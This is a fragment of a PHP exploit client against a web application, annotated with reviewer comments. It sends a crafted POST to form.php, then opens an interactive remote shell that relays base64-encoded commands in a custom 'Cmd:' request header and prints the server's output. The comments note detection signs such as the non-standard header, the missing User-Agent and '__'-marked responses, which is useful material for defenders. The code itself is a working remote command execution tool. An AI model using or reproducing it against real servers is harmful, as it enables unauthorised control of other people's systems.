{$data[header]} ");

// NOTE(review): the statement above and the construction of $data start
// before this excerpt, so the content of the POST body is not visible here.
// http_send() is also defined outside this excerpt.

// Hand-built HTTP/1.1 POST to form.php under $path, carrying $data as a
// urlencoded form body. The only headers set are Host, Content-Length,
// Content-Type, Keep-Alive and Connection; no User-Agent is sent.
$packet = "POST {$path}form.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
$packet .= $data;
http_send($host, $packet); // return value is not kept

// ...and start the shell!
// Interactive loop: each line read from stdin is relayed to the target inside
// a request header. Presumably the POST above is what makes the server act on
// that header; the server-side part is not visible in this excerpt.
define(STDIN, fopen("php://stdin", "r"));
while(1) {
    print "\nxpl0it-sh3ll > ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        // Detection surface: a GET to the application path with a
        // non-standard "Cmd:" header whose value is base64, together with
        // "Keep-Alive: 300" and no User-Agent. Access-log formats that record
        // only the request line do not capture this header, so request-header
        // logging or a WAF/IDS rule on the header name is needed to see it.
        $packet = "GET {$path} HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: ".base64_encode($cmd)."\r\n";
        $packet .= "Keep-Alive: 300\r\n";
        $packet .= "Connection: keep-alive\r\n\r\n";
        $resp = http_send($host, $packet);
        // The client looks for "__" markers in the raw response and prints
        // the segment that follows the first marker; a response without the
        // marker is treated as failure and ends the script. Responses from
        // this path containing "__"-delimited output are a second indicator.
        if (!strpos($resp, "__")) die("\n[-] Exploit failed...\n");
        $shell = explode("__", $resp);
        print "\n".$shell[1];
    } else break; // the literal input "exit" leaves the loop
}
?>